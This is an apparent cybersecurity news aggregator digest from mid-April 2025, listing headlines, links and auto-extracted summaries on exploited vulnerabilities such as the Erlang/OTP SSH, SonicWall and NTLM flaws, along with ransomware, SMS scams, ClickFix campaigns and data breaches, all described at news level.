    2025-04-19 https://www.bleepingcomputer.com/news/security/public-exploits-released-for-critical-erlang-otp-ssh-flaw-patch-now/
    Public exploits are now available for a critical Erlang/OTP SSH vulnerability tracked as CVE-2025-32433, allowing unauthenticated attackers to remotely execute code on impacted devices. [...] "

    Autosummary: The flaw was fixed in versions 25.3.2.10 and 26.2.4, but as the platform is commonly used in telecom infrastructure, databases, and high-availability systems, it may not be easy to update devices immediately. "


    When ransomware strikes, what’s your move?

    exploits ransomware
    2025-04-18 https://www.helpnetsecurity.com/2025/04/18/ciso-ransomware-negotiations/

    Should we negotiate? Should we pay? These are the questions every organization faces when cybercriminals lock their data. By the time attackers have encrypted your systems, the focus shifts from prevention to response. It’s no longer about how it happened; it’s about what you’re willing to do next. Ransomware gangs are becoming more organized and aggressive, and many now operate like businesses. They have customer service, payment portals, and negotiation playbooks. No organization is off-limits. … More

    The post When ransomware strikes, what’s your move? appeared first on Help Net Security.

    "

    Autosummary: Tim Morris, Chief Security Advisor at Tanium, said: “If it was just a legal and ethical consideration, as a matter of principle, you should not pay, and law enforcement will agree with that approach.” In May 2021, Colonial Pipeline, a major US fuel supplier, was attacked by the DarkSide ransomware group. Tabletop exercises: Simulated ransomware attacks, or tabletop exercises, prepare teams for real incidents. “A third-party highly skilled incident response team can offer businesses a plethora of expertise under one roof that may be missing from traditional in-house security teams,” said Azeem Aleem, MD of UK and Northern Europe at Sygnia. These include the dismantling of LockBit’s infrastructure, charges against the Phobos ransomware administrator, the disruption of the Radar/Dispossessor group, and the takedown of ALPHV/BlackCat leak sites. "


    Experts Uncover New XorDDoS Controller, Infrastructure as Malware Expands to Docker, Linux, IoT

    exploits industry Linux
    2025-04-18 https://thehackernews.com/2025/04/experts-uncover-new-xorddos-controller.html
    Cybersecurity researchers are warning of continued risks posed by a distributed denial-of-service (DDoS) malware known as XorDDoS, with 71.3 percent of the attacks between November 2023 and February 2025 targeting the United States. "From 2020 to 2023, the XorDDoS trojan has increased significantly in prevalence," Cisco Talos researcher Joey Chen said in a Thursday analysis. "

    Autosummary: "


    Entertainment venue management firm Legends International disclosed a data breach

    financial
    2025-04-18 https://securityaffairs.com/176674/uncategorized/legends-international-disclosed-a-data-breach.html
    Legends International disclosed a data breach from November 2024 that affected employees and visitors to its managed venues. Legends International is a global leader in sports and entertainment venue management, specializing in delivering comprehensive solutions for stadiums, arenas, and attractions. The company offers a 360-degree service platform that includes strategic planning, sales, partnerships, hospitality, merchandise, […] "

    Autosummary: The company offers a 360-degree service platform that includes strategic planning, sales, partnerships, hospitality, merchandise, and technology solutions. "


    Chinese hackers target Russian govt with upgraded RAT malware

    exploits rusia-ucrania
    2025-04-18 https://www.bleepingcomputer.com/news/security/chinese-hackers-target-russian-govt-with-upgraded-rat-malware/
    Chinese-speaking IronHusky hackers are targeting Russian and Mongolian government organizations using upgraded MysterySnail remote access trojan (RAT) malware. [...] "

    Autosummary: "


    7 Steps to Take After a Credential-Based cyberattack

    ciber
    2025-04-18 https://www.bleepingcomputer.com/news/security/7-steps-to-take-after-a-credential-based-cyberattack/
    Hackers don't break in—they log in. Credential-based attacks now fuel nearly half of all breaches. Learn how to scan your Active Directory for compromised passwords and stop attackers before they strike. [...] "

    Autosummary: Here’s what makes organizations prime targets: weak password policies create an open invitation for attackers to easily guess or crack credentials through automated tools and common password lists; failure to implement multi-factor authentication leaves even the strongest passwords vulnerable to theft; inadequate security training makes employees more vulnerable to phishing emails, social engineering tactics, and other attacks; poor network segmentation gives hackers open access once they breach a single endpoint; insufficient monitoring lets attackers operate undetected for days, weeks, or even months inside your critical systems; and employee password reuse amplifies the impact of any breach, as a single stolen credential can unlock multiple systems across personal and corporate environments. Why credential-based attacks are hackers' preferred method: cybercriminals favor credential-based attacks for several reasons. They’re easy to execute: credential-based attacks are relatively simple to deploy compared to more complex zero-day exploits. By implementing multi-factor authentication, enforcing strong password policies, training your staff regularly, auditing your Active Directory frequently and properly segmenting your network, you’ll reduce your organization's vulnerability. With this in mind, give all relevant stakeholders clear, factual updates, including senior management, legal teams, and affected users. "


    Cisco Webex bug lets hackers gain code execution via meeting links

    exploits
    2025-04-18 https://www.bleepingcomputer.com/news/security/cisco-webex-bug-lets-hackers-gain-code-execution-via-meeting-links/
    Cisco has released security updates for a high-severity Webex vulnerability that allows unauthenticated attackers to gain client-side remote code execution using malicious meeting invite links. [...] "

    Autosummary: This week, Cisco also released security patches for a privilege escalation flaw (CVE-2025-20178) in Secure Network Analytics' web-based management interface, which can let attackers with admin credentials run arbitrary commands as root. "


    Sonicwall SMA100 vulnerability exploited by attackers (CVE-2021-20035)

    exploits
    2025-04-18 https://www.helpnetsecurity.com/2025/04/18/sonicwall-sma100-vulnerability-exploited-by-attackers-cve-2021-20035/

    CVE-2021-20035, an old vulnerability affecting Sonicwall Secure Mobile Access (SMA) 100 series appliances, is being exploited by attackers. Sonicwall confirmed it by updating the original security advisory to reflect the new state of play, and by changing the description of the vulnerability to say that it can potentially lead to code execution, instead of only to denial of service (DoS). About CVE-2021-20035: Sonicwall SMA 100 series appliances provide a unified secure access gateway optimized for small … More

    The post Sonicwall SMA100 vulnerability exploited by attackers (CVE-2021-20035) appeared first on Help Net Security.

    "

    Autosummary: "


    Multi-Stage Malware Attack Uses .JSE and PowerShell to Deploy Agent Tesla and XLoader

    exploits
    2025-04-18 https://thehackernews.com/2025/04/multi-stage-malware-attack-uses-jse-and.html
    A new multi-stage attack has been observed delivering malware families like Agent Tesla variants, Remcos RAT, and XLoader. "Attackers increasingly rely on such complex delivery mechanisms to evade detection, bypass traditional sandboxes, and ensure successful payload delivery and execution," Palo Alto Networks Unit 42 researcher Saqib Khanzada said in a technical write-up of the campaign. The "

    Autosummary: The latest version of the malware is capable of accepting nearly 40 commands, allowing it to perform file management operations, execute commands via cmd.exe, spawn and kill processes, manage services, and connect to network resources via dedicated DLL modules. "


    U.S. CISA adds Apple products and Microsoft Windows NTLM flaws to its Known Exploited Vulnerabilities catalog

    exploits
    2025-04-18 https://securityaffairs.com/176687/hacking/u-s-cisa-adds-apple-products-and-microsoft-windows-ntlm-flaws-to-its-known-exploited-vulnerabilities-catalog.html
    U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Apple products and Microsoft Windows NTLM flaws to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added Apple products and Microsoft Windows NTLM vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog. Below are the descriptions of the flaws: This week Apple released out‑of‑band […] "

    Autosummary: Security patches are available for the following devices: iPhone XS and later, iPad Pro 13-inch, iPad Pro 13.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 7th generation and later, and iPad mini 5th generation and later. “Minimal interaction with a malicious file by a user such as selecting (single-click), inspecting (right-click), or performing an action other than opening or executing the file could trigger this vulnerability.” "


    Entertainment venue management firm Legends International disclosed a data breach

    financial
    2025-04-18 https://securityaffairs.com/176674/data-breach/legends-international-disclosed-a-data-breach.html
    Legends International disclosed a data breach from November 2024 that affected employees and visitors to its managed venues. Legends International is a global leader in sports and entertainment venue management, specializing in delivering comprehensive solutions for stadiums, arenas, and attractions. The company offers a 360-degree service platform that includes strategic planning, sales, partnerships, hospitality, merchandise, […] "

    Autosummary: The company offers a 360-degree service platform that includes strategic planning, sales, partnerships, hospitality, merchandise, and technology solutions. "


    Interlock ransomware gang pushes fake IT tools in ClickFix attacks

    exploits ransomware
    2025-04-18 https://www.bleepingcomputer.com/news/security/interlock-ransomware-gang-pushes-fake-it-tools-in-clickfix-attacks/
    The Interlock ransomware gang now uses ClickFix attacks that impersonate IT tools to breach corporate networks and deploy file-encrypting malware on devices. [...] "

    Autosummary: The researchers say they detected the malicious captcha on four different sites, mimicking Microsoft or Advanced IP Scanner portals: microsoft-msteams[.]com/additional-check.html, microstteams[.]com/additional-check.html, ecologilives[.]com/additional-check.html, and advanceipscaner[.]com/additional-check.html. "


    FBI: Scammers pose as FBI IC3 employees to "help" recover lost funds

    financial
    2025-04-18 https://www.bleepingcomputer.com/news/security/fbi-scammers-pose-as-fbi-ic3-employees-to-help-recover-lost-funds/
    The FBI warns that scammers posing as FBI IC3 employees are offering to "help" fraud victims recover money lost to other scammers. [...] "

    Autosummary: "


    Text scams grow to steal hundreds of millions of dollars

    financial
    2025-04-18 https://www.malwarebytes.com/blog/news/2025/04/text-scams-grow-to-steal-hundreds-of-millions-of-dollars
    Text scams come in many forms and are an ever-increasing threat doing an awful lot of financial, and other, damage. "

    Autosummary: It also implies that a lot of incidents went unreported since we find it hard to believe that the number of scams might have declined—all it takes is a look at any single week in news coverage on Malwarebytes Labs to find stories on new scams, old scams, repeated scams, and the no-good scammers behind them. The idea is to get the target to tell them they’ve got a wrong number and with that engage them in a conversation, which may lead to romance scams, pig butchering, or other investment scams. "


    Chinese Smishing Kit Powers Widespread Toll Fraud Campaign Targeting U.S. Users in 8 States

    financial government
    2025-04-18 https://thehackernews.com/2025/04/chinese-smishing-kit-behind-widespread.html
    Cybersecurity researchers are warning of a "widespread and ongoing" SMS phishing campaign that's been targeting toll road users in the United States for financial theft since mid-October 2024. "The toll road smishing attacks are being carried out by multiple financially motivated threat actors using the smishing kit developed by 'Wang Duo Yu,'" Cisco Talos researchers Azim Khodjibaev, Chetan "

    Autosummary: The phishing campaigns, per the company, impersonate U.S. electronic toll collection systems like E-ZPass, sending SMS messages and Apple iMessages to individuals across Washington, Florida, Pennsylvania, Virginia, Texas, Ohio, Illinois, and Kansas about an unpaid toll and urging them to click on a fake link sent in the chat. "


    ASUS routers with AiCloud vulnerable to auth bypass exploit

    exploits
    2025-04-18 https://securityaffairs.com/176697/security/asus-warns-of-a-router-authentication-bypass-flaw.html
    ASUS warns of an authentication bypass vulnerability in routers with AiCloud enabled that could allow unauthorized execution of functions on the device. ASUS warns of an authentication bypass vulnerability, tracked as CVE-2025-2492 (CVSS v4 score: 9.2), which impacts routers with AiCloud enabled. A remote attacker can trigger the flaw to perform unauthorized execution of functions on the […] "

    Autosummary: “It is recommended to (1) disable AiCloud and (2) disable any services that can be accessed from the internet, such as remote access from WAN, port forwarding, DDNS, VPN server, DMZ, port triggering, and FTP,” concludes the security advisory. "


    Inside PlugValley: How this AI vishing-as-a-service group operates

    financial
    2025-04-17 https://www.helpnetsecurity.com/2025/04/17/plugvalley-ai-vishing-as-a-service-video/

    In this Help Net Security video, Alexis Ober, Threat Intel Analyst at Fortra, discusses the threat actor group PlugValley, which is now offering AI-powered vishing-as-a-service. Rather than requiring technical skills or large budgets, PlugValley’s service lets any cybercriminal launch vishing campaigns using customizable AI agents with human-like voices, spoofed caller IDs, and real-time call adaptation to boost success rates — all sold via Telegram subscriptions for up to $1,999/month.

    The post Inside PlugValley: How this AI vishing-as-a-service group operates appeared first on Help Net Security.

    "

    Autosummary: "


    Review: Hands-On Industrial Internet of Things

    industry
    2025-04-17 https://www.helpnetsecurity.com/2025/04/17/review-hands-on-industrial-internet-of-things/

    Hands-On Industrial Internet of Things is a practical guide designed specifically for professionals building and securing industrial IoT (IIoT) systems. About the authors: Giacomo Veneri brings deep expertise in telecommunications and AI, shaped by over 25 years in IoT and AI applications within industrial environments. As Director of AI Specialists at Baker Hughes, he spearheads machine learning innovations that bridge cutting-edge research with practical, real-world solutions. Antonio Capasso offers extensive experience managing large-scale IT projects … More

    The post Review: Hands-On Industrial Internet of Things appeared first on Help Net Security.

    "

    Autosummary: The authors cover essential areas like secure data flow setups, analytics, and visualizations using secure, industry-standard tools such as Azure Cosmos DB, Grafana, and Azure Synapse. "


    CISA Flags Actively Exploited Vulnerability in SonicWall SMA Devices

    exploits
    2025-04-17 https://thehackernews.com/2025/04/cisa-flags-actively-exploited.html
    The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Wednesday added a security flaw impacting SonicWall Secure Mobile Access (SMA) 100 Series gateways to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. The high-severity vulnerability, tracked as CVE-2021-20035 (CVSS score: 7.2), relates to a case of operating system command injection "

    Autosummary: "


    Apple Patches Two Actively Exploited iOS Flaws Used in Sophisticated Targeted Attacks

    exploits
    2025-04-17 https://thehackernews.com/2025/04/apple-patches-two-actively-exploited.html
    Apple on Wednesday released security updates for iOS, iPadOS, macOS Sequoia, tvOS, and visionOS to address two security flaws that it said have come under active exploitation in the wild. The vulnerabilities in question are listed below - CVE-2025-31200 (CVSS score: 7.5) - A memory corruption vulnerability in the Core Audio framework that could allow code execution when processing an audio "

    Autosummary: "


    CISA tags SonicWall VPN flaw as actively exploited in attacks

    exploits
    2025-04-17 https://www.bleepingcomputer.com/news/security/cisa-tags-sonicwall-vpn-flaw-as-actively-exploited-in-attacks/
    On Wednesday, CISA warned federal agencies to secure their SonicWall Secure Mobile Access (SMA) 100 series appliances against attacks exploiting a high-severity remote code execution vulnerability. [...] "

    Autosummary: "


    Apple plugs zero-day holes used in targeted iPhone attacks (CVE-2025-31200, CVE-2025-31201)

    exploits
    2025-04-17 https://www.helpnetsecurity.com/2025/04/17/apple-plugs-zero-days-holes-used-in-targeted-iphone-attacks-cve-2025-31200-cve-2025-31201/

    Apple has released emergency security updates for iOS/iPadOS, macOS, tvOS and visionOS that fix two zero-day vulnerabilities (CVE-2025-31200, CVE-2025-31201) that have been exploited “in an extremely sophisticated attack against specific targeted individuals on iOS.” CVE-2025-31200 and CVE-2025-31201: CVE-2025-31200 affects CoreAudio, an API Apple devices use for processing audio. The memory corruption vulnerability can be triggered with a maliciously crafted media file: when the audio stream in it is processed, it allows attackers to execute malicious … More

    The post Apple plugs zero-day holes used in targeted iPhone attacks (CVE-2025-31200, CVE-2025-31201) appeared first on Help Net Security.

    "

    Autosummary: These latest attacks were aimed against specific individuals, which means that Apple users who are not journalists, activists/dissidents, politicians/diplomats, researchers and executives in sensitive fields, or other users who have access to valuable data or communications, are unlikely to be in grave danger. "


    Cyber threats against energy sector surge as global tensions mount

    industry
    2025-04-17 https://www.helpnetsecurity.com/2025/04/17/cyber-threats-against-energy-sector-surge/

    Cyberattacks targeting the energy sector are increasing, driven by a host of geopolitical and technological factors. A report published by Sophos in July 2024, which surveyed 275 cybersecurity and IT leaders from the energy, oil/gas, and utilities sector across 14 countries, found that 67% of respondents said their organizations had suffered a ransomware attack in the last year. While Sophos’ figure remained steady year-over-year, a January 2025 report authored by TrustWave said that ransomware … More

    The post Cyber threats against energy sector surge as global tensions mount appeared first on Help Net Security.

    "

    Autosummary: According to EPRI’s Wikipedia page, the institute is an American “independent, nonprofit organization that conducts research and development related to the generation, delivery, and use of electricity to help address challenges in the energy industry, including reliability, efficiency, affordability, health, safety, and the environment.”
    Access & data brokers: Other notable energy sector data leaks and access listings observed by Resecurity, and which are at heightened risk of being weaponized by ransomware actors and other threat actors, include: 30 GB of confidential data from Qatar Gas, ADNOC Offshore, and Bell Energy; Office 365 Exchange access for a U.S. energy firm that generates $6 billion in annual revenue; network remote code execution access to “the largest energy company in North Africa”. The Emirates-focused data leaks were published on the XSS cybercrime forum on December 28, 2024. By citing the export control part of GE’s network, the threat actor is likely referencing servers or databases storing classified or controlled technical data, network segments linked to military contracts, or sensitive R&D. On January 28, the threat actor wrote a follow-up post to their initial thread and claimed the GE global network access credentials offer entry points to servers, network devices, firewalls, load balancers, and VPN accounts.
    Energy sector victims allegedly compromised by Handala include: BLEnergy – a leading battery energy storage systems (BESS) integrator and provider in Israel; ELitech – a company providing engineering and project management services to renewable energy, private power plants, gas insulated substations (GIS), defense and military projects, and projects requiring a high degree of technological expertise. In July 2024, Handala published a post on the RAMP cybercrime forum announcing the hack and leak of 145 GB of data belonging to BLEnergy. According to the company’s webpage, “IKAV is an international asset management group that provides institutional investors with investment solutions spanning a broad range of infrastructure energy assets, including solar, concentrated solar power, wind, energy efficiency, geothermal, thermal power plants and upstream.” In a ransom announcement that has since been removed from HellCat’s data leak site (DLS), the threat group claimed the “breach has compromised critical data, including projects, issues, and plugins, along with over 400,000 rows of user data, totaling more than 40GB Compressed Data.” PLCs targeted in this attack campaign are “commonly used in the Water and Wastewater Systems (WWS) Sector and used in other industries including, but not limited to, energy, food and beverage manufacturing, transportation systems, and healthcare,” according to CISA.
    In this post, the threat actor claims to have access to over 5,000 stolen PDF files related to the United Arab Emirates nuclear program, including inspection reports, security procedures, technical documents, invoices, and other documents. According to BleepingComputer, the platform “often contains sensitive data, such as source code, authentication keys, IT plans, customer information, and internal discussions related” to these software development projects. This access listing claimed to include administrative passwords for routers, switches, F5s, WASS’s, ISE, firewalls, and proxies. Further listings: VPN access for a Greek nuclear energy company; Electric Power Research Institute (EPRI) database; GE network logins, including access to nuclear power plants; DDoS attack on Framatome in France; DDoS attacks on Doel and Tihange nuclear plants in Belgium. The Malaysian Nuclear Agency database leak was posted on Breach Forums on December 3, 2024 by a threat actor who goes by the handle ‘Ciph3r.’ [Hacktivist] Based on this compilation of leading threat actors, defenders should be especially aware of HellCat’s tactics, techniques, and procedures (TTPs), specifically their reliance on infostealer attack chains, with an emphasis on Lumma malware. This threat intelligence research is a continuation of our material published last year – “Ransomware Attacks against the Energy Sector on the rise – Nuclear and Oil & Gas are Major Targets in 2024”, highlighting threat actors targeting energy installations in North America, Asia, and the European Union, including nuclear facilities and related research entities.
    The threat actors claimed the attack inflicted the following cyber-physical damage: “The valves were broken, the seals were damaged by increasing the pressure, the server failed, the flow power in the group settings was increased, which will inevitably lead to wear of the equipment and strategically important parts for work.” According to the December Cyble report, Z-Pentest claimed to have disrupted “critical systems at an oil well site, including systems responsible for water pumping, petroleum gas flaring, and oil collection.” While there is no substantive link between the johnsherlock access broker persona and Midnight Blizzard, the critical nature of this type of access listing, combined with the geoeconomically sensitive nature of the victim’s industry category (energy), and the relatively high price of the listing, merit closer investigation. Two prominent pro-Russia hacktivist groups that have generated publicity for their energy-sector targeting, despite general skepticism regarding their claims, are ‘Z-Pentest’ and its partner organization, ‘Sector 16’ (S16). A 6-minute screen recording posted by the threat actor showed “detailed screenshots of the facility’s control systems, showing tank setpoints, vapor recovery metrics, and operational dashboards allegedly accessed and changed during the breach,” according to Cyble.


    Symbiotic Security v1 empowers developers to write secure code

    industry
    2025-04-17 https://www.helpnetsecurity.com/2025/04/17/symbiotic-security-version-1/

    Symbiotic Security launched Symbiotic Security version 1, which ensures code security keeps pace with development speed by using AI to secure code in real time through remediation and training integrated within developers’ workflows. Symbiotic Security v1 empowers developers to write secure code from the outset of the development process and to maximize the productivity gains of AI-assisted coding. Its intelligent detection and remediation identify vulnerabilities in real time, instantly providing secure code suggestions that developers can accept, modify, …

    The post Symbiotic Security v1 empowers developers to write secure code appeared first on Help Net Security.


    Autosummary: The built-in AI chatbot builds developers’ security skills, delivering specific training on any vulnerabilities it detects, then explaining remediation strategies, and generating suggested fixes. “Making security a positive experience for developers is key to growing their cyber judgement and knowledge,” said Edouard Viot, CTO, Symbiotic Security.


    Critical Erlang/OTP SSH Vulnerability (CVSS 10.0) Allows Unauthenticated Code Execution

    exploits
    2025-04-17 https://thehackernews.com/2025/04/critical-erlangotp-ssh-vulnerability.html
    A critical security vulnerability has been disclosed in the Erlang/Open Telecom Platform (OTP) SSH implementation that could permit an attacker to execute arbitrary code sans any authentication under certain conditions. The vulnerability, tracked as CVE-2025-32433, has been given the maximum CVSS score of 10.0. "The vulnerability allows an attacker with network access to an Erlang/OTP SSH "

    Autosummary: "The vulnerability allows an attacker with network access to an Erlang/OTP SSH server to execute arbitrary code without prior authentication," Ruhr University Bochum researchers Fabian Bäumer, Marcus Brinkmann, Marcel Maehren, and Jörg Schwenk said.


    Node.js Malware Campaign Targets Crypto Users with Fake Binance and TradingView Installers

    exploits
    2025-04-17 https://thehackernews.com/2025/04/nodejs-malware-campaign-targets-crypto.html
    Microsoft is calling attention to an ongoing malvertising campaign that makes use of Node.js to deliver malicious payloads capable of information theft and data exfiltration. The activity, first detected in October 2024, uses lures related to cryptocurrency trading to trick users into installing a rogue installer from fraudulent websites that masquerade as legitimate software like Binance or

    Autosummary: Once the exclusions are set, an obfuscated PowerShell command is run to fetch and run scripts from remote URLs that are capable of gathering extensive information related to the operating system, BIOS, hardware, and installed applications.


    Apple released emergency updates for actively exploited flaws

    exploits
    2025-04-17 https://securityaffairs.com/176644/security/apple-emergency-updates-actively-exploited-ios-ipados-macos-bugs.html
    Apple released emergency updates to fix iOS, iPadOS & macOS vulnerabilities actively exploited in sophisticated attacks. Apple released out‑of‑band security updates to address two vulnerabilities, tracked as CVE-2025-31200 and CVE-2025-31201, impacting iOS, iPadOS & macOS. The company confirmed that the flaws have been exploited in a small number of “extremely sophisticated” attacks against iOS targets. […]

    Autosummary: Security patches are available for the following devices: iPhone XS and later, iPad Pro 13-inch, iPad Pro 13.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 7th generation and later, and iPad mini 5th generation and later.


    U.S. CISA adds SonicWall SMA100 Appliance flaw to its Known Exploited Vulnerabilities catalog

    exploits
    2025-04-17 https://securityaffairs.com/176630/hacking/u-s-cisa-adds-sonicwall-sma100-appliance-flaw-to-its-known-exploited-vulnerabilities-catalog.html
    U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds SonicWall SMA100 Appliance flaw to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a SonicWall SMA100 Appliance flaw, tracked as CVE-2021-20035, to its Known Exploited Vulnerabilities (KEV) catalog. The vulnerability is an OS Command Injection Vulnerability in the SMA100 management interface. A […]



    "Scammers used fake app to steal from me in person"

    financial
    2025-04-17 https://www.bbc.com/news/articles/cn05d58jwvdo
    Fake bank apps mimic legitimate mobile banking platforms, allowing fraudsters to walk away with high-value items.

    Autosummary: "In the coming months, we will set out further details including plans to strengthen international cooperation, introduce better protections against AI-enabled fraud, and increase collaboration between government and the private sector," they added. A spokesperson said the fake banking app scam is "a concern" and they gave the following safety advice: Do not be pressured into accepting payment by bank transfer. Never hand over goods unless you are sure you have received the money, and check your own bank account to see if the payment has arrived. Check if the buyer has a newly registered profile before you meet them, as this may mean they are not who they say they are. "He handed his phone over to me and I typed in my account details, clicked send, and it came up with a successful payment notification," Mr Rudd said.


    Windows NTLM vulnerability exploited in multiple attack campaigns (CVE-2025-24054)

    exploits
    2025-04-17 https://www.helpnetsecurity.com/2025/04/17/windows-ntlm-vulnerability-exploited-in-multiple-attack-campaigns-cve-2025-24054/

    CVE-2025-24054, a Windows NTLM hash disclosure vulnerability that Microsoft patched last month, has been leveraged by threat actors in campaigns targeting government and private institutions in Poland and Romania. “Active exploitation in the wild has been observed since March 19, 2025, potentially allowing attackers to leak NTLM hashes or user passwords and compromise systems,” Check Point researchers have shared. About CVE-2025-24054: CVE-2025-24054 allows attackers to capture the NTLMv2 response (i.e., the NTLMv2-SSP …

    The post Windows NTLM vulnerability exploited in multiple attack campaigns (CVE-2025-24054) appeared first on Help Net Security.


    Autosummary: Both were patched on March 11, 2025, and both can allow an unauthorized attacker to perform spoofing over a network, but the former requires the target to open a folder that contains a specially crafted file, while the latter requires them only to interact with (e.g., select, inspect, move) the malicious file, and not necessarily to open and execute it.


    State-Sponsored Hackers Weaponize ClickFix Tactic in Targeted Malware Campaigns

    exploits government
    2025-04-17 https://thehackernews.com/2025/04/state-sponsored-hackers-weaponize.html
    Multiple state-sponsored hacking groups from Iran, North Korea, and Russia have been found leveraging the increasingly popular ClickFix social engineering tactic to deploy malware over a three-month period from late 2024 through the beginning of 2025. The phishing campaigns adopting the strategy have been attributed to clusters tracked as TA427 (aka Kimsuky), TA450 (aka MuddyWater,

    Autosummary: The TA450 ClickFix campaign is said to target finance, government, health, education, and transportation sectors across the Middle East, with an emphasis on the United Arab Emirates (U.A.E.) and Saudi Arabia, as well as those located in Canada, Germany, Switzerland, and the United States. ClickFix, in a nutshell, refers to a sneaky technique that urges users to infect their own machine by following a series of instructions to copy, paste, and run malicious commands under the pretext of fixing an issue, completing a CAPTCHA verification, or registering their device.


    Colombia declares health emergency after dozens die of yellow fever

    latam
    2025-04-17 https://www.bbc.com/news/articles/cj68x4p412eo
    Health authorities are urging people to get vaccinated before travelling to risk areas for Easter.

    Autosummary: According to the World Health Organisation (WHO), most people recover after the first phase of infection which usually involves fever, muscle and back pain, headache, shivers, loss of appetite, and nausea or vomiting.


    Ahold Delhaize confirms data theft after INC ransomware claims attack

    exploits ransomware
    2025-04-17 https://www.bleepingcomputer.com/news/security/ahold-delhaize-confirms-data-theft-after-inc-ransomware-claims-attack/
    Food retail giant Ahold Delhaize confirms that data was stolen from its U.S. business systems during a November 2024 cyberattack. [...]

    Autosummary: The company has reported yearly revenues of approximately $100 billion, and in the American market, it operates under brands such as Food Lion, Stop & Shop, Giant Food, and Hannaford.


    CTM360 Tracks Global Surge in SMS-Based Reward and Toll Scams

    financial
    2025-04-17 https://www.bleepingcomputer.com/news/security/ctm360-tracks-global-surge-in-sms-based-reward-and-toll-scams/
    Thousands tricked by fake reward & toll scam texts. CTM360 exposes PointyPhish & TollShark—SMS phishing campaigns powered by the Darcula PhaaS platform, with 5K+ domains stealing payment info worldwide. [...]

    Autosummary: PointyPhish is linked to over 3,000 domains and phishing sites, preying on urgency by claiming expiring reward points to trick customers into fraudulent sites that steal payment details. Similarly, TollShark involves over 2,000 domains and phishing sites, exploiting fears of unpaid tolls to capture sensitive information from unsuspecting individuals. Two different campaigns, one common tactic: PointyPhish sends fake SMS alerts about expiring reward points to banking, airline, and retail store customers, leading to phishing pages that steal full credit/debit card details.


    Critical Erlang/OTP SSH pre-auth RCE is "Surprisingly Easy" to exploit, patch now

    exploits
    2025-04-17 https://www.bleepingcomputer.com/news/security/critical-erlang-otp-ssh-pre-auth-rce-is-surprisingly-easy-to-exploit-patch-now/
    A critical vulnerability in Erlang/OTP's SSH implementation, tracked as CVE-2025-32433, has been disclosed that allows for unauthenticated remote code execution on vulnerable devices. [...]



    Entertainment services giant Legends International discloses data breach

    financial
    2025-04-17 https://www.bleepingcomputer.com/news/security/entertainment-services-giant-legends-international-discloses-data-breach/
    Entertainment venue management firm Legends International warns it suffered a data breach in November 2024, which has impacted employees and people who visited venues under its management. [...]



    Windows NTLM hash leak flaw exploited in phishing attacks on governments

    financial exploits government
    2025-04-17 https://www.bleepingcomputer.com/news/security/windows-ntlm-hash-leak-flaw-exploited-in-phishing-attacks-on-governments/
    A Windows vulnerability that exposes NTLM hashes using .library-ms files is now actively exploited by hackers in phishing campaigns targeting government entities and private companies. [...]

    Autosummary: The malicious archive also contains three more files, namely "xd.url," "xd.website," and "xd.link," which leverage older NTLM hash leak flaws and are most likely included for redundancy in case the "library-ms" method fails.


    Strategic AI readiness for cybersecurity: From hype to reality

    ciber
    2025-04-16 https://www.helpnetsecurity.com/2025/04/16/ai-readiness-framework/

    AI readiness in cybersecurity involves more than just possessing the latest tools and technologies; it is a strategic necessity. Many companies could encounter serious repercussions, such as increased volumes of advanced cyber threats, if they fail to exploit AI due to a lack of clear objectives, inadequate data readiness or misalignment with business priorities. Foundational concepts are vital for constructing a robust AI-readiness framework for cybersecurity. These concepts encompass the organization’s technology, data, security, governance …

    The post Strategic AI readiness for cybersecurity: From hype to reality appeared first on Help Net Security.


    Autosummary: Action: Organizations must efficiently deploy an LLMOps pipeline integrated with AIOps to create a self-learning security ecosystem that supports continuous integration, model training and fine-tuning, model deployment and delivery, model retraining, and evaluation based on new threat intelligence. By addressing these issues, organizations can unlock AI’s potential to provide real-time threat detection, proactive response and adaptive defenses, ensuring that cybersecurity stays ahead of increasingly complex and frequent threats. Strong foundations and constant scrutiny: AI readiness is about creating a holistic approach where organizations integrate data readiness, governance, ethical considerations, and collaboration into their AI strategy.


    U.S. Govt. Funding for MITRE's CVE Ends April 16, Cybersecurity Community on Alert

    ciber
    2025-04-16 https://thehackernews.com/2025/04/us-govt-funding-for-mitres-cve-ends.html
    The U.S. government funding for non-profit research giant MITRE to operate and maintain its Common Vulnerabilities and Exposures (CVE) program will expire Wednesday, an unprecedented development that could shake up one of the foundational pillars of the global cybersecurity ecosystem. The 25-year-old CVE program is a valuable tool for vulnerability management, offering a de facto standard to

    Autosummary: "If a break in service were to occur, we anticipate multiple impacts to CVE, including deterioration of national vulnerability databases and advisories, tool vendors, incident response operations, and all manner of critical infrastructure," Barsoum noted in a letter sent to CVE Board Members.


    Cyber Threats Against Energy Sector Surge as Global Tensions Mount

    industry
    2025-04-16 https://securityaffairs.com/176591/hacking/cyber-threats-against-energy-sector-surge-as-global-tensions-mount.html
    Resecurity warns of rising cyberattacks on the energy sector, some linked to large-scale campaigns targeting national infrastructure for geopolitical aims. Resecurity warns about the increase in targeted cyberattacks against enterprises in the energy sector worldwide. Some of these attacks represent much larger campaigns designed to target country-level infrastructure, acting as tools for geopolitical influence. It is […]

    Autosummary: Pierluigi Paganini, April 16, 2025. Resecurity warns of rising cyberattacks on the energy sector, some linked to large-scale campaigns targeting national infrastructure for geopolitical aims.


    Government contractor Conduent disclosed a data breach

    financial government
    2025-04-16 https://securityaffairs.com/176581/data-breach/government-contractor-conduent-disclosed-a-data-breach.html
    The business services provider Conduent told the SEC a January cyberattack exposed personal data, including names and Social Security numbers. The business services provider Conduent revealed that personal information, including names and Social Security numbers, was stolen in a January cyberattack. In January, Conduent confirmed a cyberattack caused service disruptions after agencies in multiple US […]

    Autosummary: Due to the complexity of the files, the Company engaged cybersecurity data mining experts to evaluate the exfiltrated data and was recently informed of its nature, scope and validity, confirming that the data sets contained a significant number of individuals’ personal information associated with our clients’ end-users.”


    Gamma AI Platform Abused in Phishing Chain to Spoof Microsoft SharePoint Logins

    financial
    2025-04-16 https://thehackernews.com/2025/04/ai-powered-gamma-used-to-host-microsoft.html
